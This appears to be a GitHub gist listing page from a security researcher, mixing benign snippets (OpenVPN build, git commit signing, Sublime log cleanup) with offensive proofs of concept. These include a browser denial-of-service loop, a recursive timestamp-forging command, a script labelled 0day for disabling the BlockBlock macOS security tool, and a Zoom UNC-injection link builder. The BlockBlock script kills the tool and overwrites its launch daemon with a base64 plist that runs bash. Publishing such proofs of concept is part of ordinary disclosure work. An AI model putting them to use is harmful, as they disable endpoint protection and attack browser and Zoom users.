
Sabri pwnsdx

@pwnsdx
pwnsdx / touch.sh
Last active Dec 22, 2018
Change creation/access/modification time recursively
find . -exec touch -t 199912312359 {} \;
@pwnsdx
pwnsdx / gist:71c421abf2a45ac4c6df
Created Jan 30, 2016
Build development version of OpenVPN with latest version of LibreSSL
# Install mandatory dependencies
brew install --build-from-source automake autoconf libtool pkg-config
# Install LibreSSL from sources
brew install --build-from-source libressl
# LDFLAGS: -L/usr/local/opt/libressl/lib
# CPPFLAGS: -I/usr/local/opt/libressl/include
# Clone OpenVPN from the repo
cd $HOME/Desktop && git clone https://github.com/OpenVPN/openvpn && mv openvpn openvpn-dev-2.4.0 && cd openvpn-dev-2.4.0
@pwnsdx
pwnsdx / openvpn.conf
Last active Dec 22, 2018
Verify OpenVPN CA/CN in Node.js (VPN.ac used here)
# Add this in the config file
tls-verify "/usr/local/bin/node [absolute path]/verify.js 'C=RO, ST=BUC, O=VPN.AC, OU=VPN.AC CA, CN=VPN.AC, emailAddress=info@vpn.ac' ch1-4096"
@pwnsdx
pwnsdx / Tutorial.md
Last active Dec 22, 2018
How to erase Sublime Text 3 interesting logs

Hi there,

How to erase Sublime Text 3 interesting logs

Yes, Sublime Text logs a lot of interesting information in its .sublime_session file, such as everything you search for in files and the path of every file you open, forever.

How do I prevent that?

You can't, short of symlinking the .sublime_session file to /dev/null, which I think is bad practice for this software. Instead, I can only suggest running the command below from time to time. It securely removes the file in 7 passes.

@pwnsdx
pwnsdx / dos-experiment.html
Last active Mar 25, 2019
Chrome / IE / Opera / ... DoS
<script>document.location.href='#';while(true)window.history.back(),window.history.forward();</script>
@pwnsdx
pwnsdx / index.html
Created Mar 30, 2019
Electron Fiddle Gist
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Hello World!</title>
</head>
<body>
<h1>Hello World!</h1>
<!-- All of the Node.js APIs are available in this renderer process. -->
We are using Node.js <script>document.write(process.versions.node)</script>,
@pwnsdx
pwnsdx / git.sh
Last active Apr 19, 2020
Sign commits automatically on macOS Sierra and GitHub Desktop
# Install GPG Tools 2 and generate your PGP keys
# Add the public key to your GitHub account
# Get your long id by doing: gpg --list-keys --keyid-format long
# Execute this:
# Ty https://github.com/Microsoft/vscode/issues/5065#issuecomment-207960831
git config --global user.signingkey [LONG KEY ID] && git config --global commit.gpgsign true && git config --global gpg.program gpg2; echo 'no-tty' >> ~/.gnupg/gpg.conf
@pwnsdx
pwnsdx / bb.sh
Last active Jun 3, 2020
Multiple ways to bypass BlockBlock (<=0.9.4, 0DAY)
# 1. Kill BlockBlock Agent
(pkill -n BlockBlock; touch ~/Library/LaunchAgents/com.fsociety.unprivilegied.plist; /Applications/BlockBlock.app/Contents/MacOS/BlockBlock agent)
# 2. Kill BlockBlock Daemon (requires privileges)
(pkill -o BlockBlock; touch /Library/LaunchDaemons/com.fsociety.rootkit.plist; /Applications/BlockBlock.app/Contents/MacOS/BlockBlock daemon)
# 3. Inject malicious data into existing plists (will create "pwned" file in /tmp) (requires privileges)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBPdG91Y2ggL3RtcC9wd25lZDsgL0FwcGxpY2F0aW9ucy9CbG9ja0Jsb2NrLmFwcC9Db250ZW50cy9NYWNPUy9CbG9ja0Jsb2NrIGRhZW1vbglfECJjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suZGFlbW9uCBEnOkRKS09UV6mqAAAAAAAAAQEAAAAAAAAADAAAAAAAAAAAAAAAAAAAAM8=" | base64 --decode) > /Library/LaunchDaemons/com.objectiveSee.blockblock.plist)
# 4. Same as 3 but use hard links (will create "pwned" file in /tm
@pwnsdx
pwnsdx / converter.js
Last active Oct 18, 2020
Zoom UNC Injection via Link Previews
// Usage to build a custom url
// sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&thumbnailUrl=https%3A%2F%2Fwww.getdigital.eu%2Fweb%2Fgetdigital%2Fgfx%2Fproducts%2F__generated__resized%2F380x380%2FAufkleber_Trollface.jpg"
// Your URL is zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3Il
@pwnsdx
pwnsdx / Tutorial.md
Last active Nov 18, 2020
Change your MAC address on iOS 7-8 (not working on iOS 9 atm)

Hi there,

Change your MAC address on iOS 7-8

Changing your MAC address can be extremely useful in some situations. Let me give you a few:

  • You are limited by time on public networks and everyone wants more than just 15 minutes of internet.
  • You want to regenerate your UDID.
  • A lot of governments rely on this to find you and then intercept your data. In France, for example, secret services have full access to public Wi-Fi and can therefore locate you by using your MAC address.